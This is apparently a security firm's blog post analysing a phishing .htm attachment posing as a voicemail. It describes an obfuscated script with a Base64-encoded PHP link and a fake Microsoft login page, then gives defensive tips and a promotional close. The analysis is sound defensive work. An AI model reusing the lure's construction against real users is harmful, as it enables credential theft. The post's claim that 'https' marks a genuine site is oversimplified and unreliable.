This specific attack is interesting; attackers are often looking for new and creative ways to deliver their payloads. Their purpose in doing so is multi-folded:
An attempt to bypass security products
An attempt to bypass security training
An attempt to harvest credentials from unsuspecting users
Even potential victims may have been trained to avoid opening documents, scripts, and executables from unknown senders, it is nowadays important to be careful with almost any file type.
Malicious file attachment:
To protect the privacy of the individual that received this file, all identifying information has either been redacted or obscured.
An executive received a suspicious email, which they were concerned was sent by a threat actor. The email looked like an eFax message with a poorly worded .htm attachment. The attachment appeared to be a recycled lure of a voicemail attachment as can be seen by the Play button and the 37 secs in the file description.
The initial phishing message was sent via an attached.htm file named “(redacted) ▶ ─────── 01mins37secs.htm”. The individual did not open the email, but sent a copy of the attachment for analysis. We were unable to obtain email headers of the original email.
The first step was attempt to de-obfuscate the code. I used an online tool from Coder’s Toolbox to perform this, with the settings for URL, Decode, and US-ASCII. This approach provided an output of readable code:
I then used another online tool named js-beautify to clean up the code and make it more presentable:
Line 3: Contains the recipient of the phishing email
Line 4: Contains a Base64 encoded URL link to a php file
Line 6: Is a self-contained webpage that replicated a Microsoft Login page
Since this code contained an URI Component, it was time to extract some more information. I used Mozilla’s developer tool decodeURI() by pasting in the portions in-between the script and we got what was a prompt to enter our Microsoft Password:
Using Developer tools from Google Chrome and reloading the .htm page, we can gain some insightful information from the Headers. Here we can see a request to a URL that calls file labeled “o365.php”.
How was this possible?
Providers such as Google, flag malicious websites when they present a risk for users in the form of malware. From what it appears, this site has only been around for approximately 4 months, and is not flagged as malicious by a few vendors.
How can you protect yourself?
Since spam and phishing emails can take a variety of forms, we suggest the following:
Never open emails and/or attachments from untrusted sources. If you have received an email that looks “out of the norm”, it is always better to report it to your IT support team or email provider
Never enter you credentials in a website that is missing the “https” in the beginning of the URL e.g. “https[:]//login.microsoft.com” is the correct URL. The URL “http[:]//login.microssoft.com” is not
Block the spam email address
Delete the spam email message
Keep your device’s OS, software and anti-malware software up to date
Polito Inc. offers a wide range of security consulting services including threat hunting, penetration testing, vulnerability assessments, red teaming engagements, incident response, digital forensics, and more. If your business or your clients have any cyber security needs, contact our experts and experience what Masterful Cyber Security is all about.